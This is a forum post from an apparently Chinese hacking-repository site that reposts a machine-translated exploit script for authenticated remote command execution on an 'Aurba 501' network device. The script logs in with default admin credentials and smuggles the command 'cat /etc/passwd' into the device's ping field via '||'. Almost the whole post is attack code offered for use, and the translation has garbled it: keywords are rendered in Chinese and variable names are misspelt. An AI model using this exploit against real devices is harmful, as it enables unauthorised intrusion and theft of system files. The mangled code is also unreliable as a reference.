H

aurba 501-经过身份验证的RCE

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:远程命令执行|大道501
#日期: 17-07-2024
#利用作者: Hosein Vita
#供应商homepage: https://www.hpe.com
#版本: Aurba 501 CN12G5W0XX
#在: Linux上测试
导入请求
从请求中
def get_input(提示,default_value):
user_input=输入(提示)
返回user_input如果user_input else default_value
base_url=输入('输入基本URL:')
如果不是base_url:
打印(“需要基本URL。”)
出口(1)
用户名=get_input('输入用户名(Default: Admin):','admin')
密码=get_input('输入密码(Default: Admin):','admin')
login_url=f'{base_url}/login.cgi'
login_payload={
'username':用户名,
'password':密码,
'login':'登录'
}
login_headers={
'Accept-ongoding':'Gzip,Deflate,br',
'content-type':'应用程序/x-www-form-urlencoded',
'Origin': base_url,
'Connection':'关闭'
}
session=requests.session()
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.insecurreequestwarning)
#登录系统
响应=session.post(login_url,headers=login_headers,data=login_payload,verify=false)
#检查登录是否成功
如果wist.status_code==200和'登录失败'not wons.text.lower():
打印('登录成功!')
#要在设备上执行的命令
命令='cat /etc /passwd'
ping_ip=f'4.2.2.4 || {命令}'
#要在邮政请求中发送的数据
数据={
'ping_ip': ping_ip,
'ping_timeout':'1',
'textareai':'',
'ping_start':'ping'
}
#要发送请求的标题
标题={
'Accept-ongoding':'Gzip,Deflate,br',
'content-type':'应用程序/x-www-form-urlencoded',
'Origin': base_url,
'referer': f'{base_url}/admin.cgi?action=ginging',
'Connection':'关闭'
}
#发送HTTP POST请求以利用漏洞
exploit_url=f'{base_url}/admin.cgi?action=ing'
响应=session.post(exploit_url,headers=标题,data=data,verify=false)
如果有任何('root in value for value in wendys.headers.values.values()):
打印('利用成功! /etc /passwd文件内容在eNaders:'中反映)
打印(响应。
其他:
打印(“利用失败。响应标头不包含预期的输出。”)
其他:
打印('登录失败。请检查凭据并重试。')
#打印响应标题以进行进一步分析
打印(响应。
 
后退
顶部